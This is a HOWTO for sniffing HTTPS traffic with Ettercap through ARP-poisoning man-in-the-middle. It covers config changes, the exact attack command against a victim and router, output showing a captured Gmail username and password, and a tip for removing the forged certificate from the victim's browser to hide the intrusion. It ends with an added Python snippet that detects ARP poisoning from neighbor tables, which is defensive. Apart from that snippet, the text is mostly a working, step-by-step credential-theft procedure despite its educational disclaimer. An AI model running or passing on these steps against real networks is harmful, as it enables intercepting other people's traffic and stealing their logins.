Ettercap is a monitoring tool (sniffer) that can be used for studying applications, forensic analysis, and other purposes. The aim of this article is to explain how to configure Ettercap to get the most out of it. Article in English.

*** WARNING : This HOWTO is for educational purposes only. Do NOT carry out the following steps on a LAN without permission. Otherwise, you will be put in jail. ***

Sniffing SSL (https) traffic on a LAN with ettercap by means of a Man In The Middle (MITM) attack.

Step 1 :

    nano /etc/etter.conf

Make the following change :

    [privs]
    ec_uid = 0 # nobody is the default
    ec_gid = 0 # nobody is the default

Uncomment the following :

    # if you use iptables:
    redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
    redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Step 2 :

The victim's machine is at 192.168.1.100 while the router is at 192.168.1.1. The attacker is at 192.168.1.115.

    ettercap -TqM arp:remote /192.168.1.100/ /192.168.1.1/

The output is displayed as follows :

    ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

    Dissector "dns" not supported (etter.conf line 72)
    Listening on eth0... (Ethernet)

    eth0 -> 08:00:27:FF:95:DB 192.168.1.115 255.255.255.0

    Privileges dropped to UID 0 GID 0...

    28 plugins
    39 protocol dissectors
    53 ports monitored
    7587 mac vendor fingerprint
    1698 tcp OS fingerprint
    2183 known services

    Scanning for merged targets (2 hosts)...

    * |=================================================>| 100.00 %

    2 hosts added to the hosts list...

    ARP poisoning victims:

    GROUP 1 : 192.168.1.100 70:1A:04:FF:0A:9A

    GROUP 2 : 192.168.1.1 00:1E:10:FF:A7:E2
    Starting Unified sniffing...

    Text only Interface activated...
    Hit 'h' for inline help

Step 3 :

At the victim's machine, open a browser, such as Firefox, and go to GMail. You will be asked to accept an untrusted certificate. Just accept the certificate and you will be directed to the login screen of GMail.

When the victim logs in to GMail, his/her username and password will be logged on the attacker's machine. The display will be similar to the following :

    HTTP : 74.125.71.106:443 -> USER: samiux PASS: password INFO: https://www.google.com/accounts/ServiceLogin?service=mail&passive=true&rm=false&continue=http://mail.google.com/mail/?ui=html&zy=l&bsv=llya694le36z&s

In this output the captured values are USER: samiux and PASS: password.

Remarks :

To delete the untrusted certificate in Firefox on the victim's machine : "Edit" -- "Preferences" -- "View Certificate List" -- "Server". You will find something like the following. You just delete them all.
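
Seen from the defending side, the ARP poisoning in Step 2 leaves a trace in the victim's neighbor table: the router's IP starts resolving to the attacker's MAC. The following check is an added example, not part of the original HOWTO; the `ip neigh show` snapshots are constructed from the addresses on this page, and the function names are hypothetical.

```python
import re
from collections import defaultdict

# Constructed `ip neigh show` snapshots as seen on the victim (192.168.1.100),
# built from the addresses in this HOWTO; not captured output.
BASELINE = """\
192.168.1.1 dev eth0 lladdr 00:1e:10:ff:a7:e2 REACHABLE
192.168.1.115 dev eth0 lladdr 08:00:27:ff:95:db STALE
"""
POISONED = """\
192.168.1.1 dev eth0 lladdr 08:00:27:ff:95:db REACHABLE
192.168.1.115 dev eth0 lladdr 08:00:27:ff:95:db REACHABLE
192.168.1.50 dev eth0  FAILED
"""

NEIGH_RE = re.compile(r"^(\S+)\s+dev\s+\S+\s+lladdr\s+([0-9A-Fa-f:]{17})\b")


def parse_neigh(text):
    """Return {ip: mac} for neighbor entries that carry a link-layer address."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:  # FAILED/INCOMPLETE entries have no lladdr and are skipped
            table[m.group(1)] = m.group(2).lower()
    return table


def arp_poison_findings(baseline, current, gateway):
    """Compare a known-good snapshot with the current one (hypothetical helper)."""
    base, cur = parse_neigh(baseline), parse_neigh(current)
    findings = []
    # Strong signal: the gateway IP now resolves to a different MAC.
    if gateway in base and gateway in cur and base[gateway] != cur[gateway]:
        findings.append(("gateway-mac-changed", gateway, base[gateway], cur[gateway]))
    # Weaker signal: one MAC answers for several IPs. Proxy ARP or a multi-homed
    # router can also cause this, so treat it as a lead, not proof.
    by_mac = defaultdict(list)
    for ip, mac in cur.items():
        by_mac[mac].append(ip)
    for mac, ips in sorted(by_mac.items()):
        if len(ips) > 1:
            findings.append(("mac-shared", mac, tuple(sorted(ips))))
    return findings


if __name__ == "__main__":
    for finding in arp_poison_findings(BASELINE, POISONED, "192.168.1.1"):
        print(finding)
```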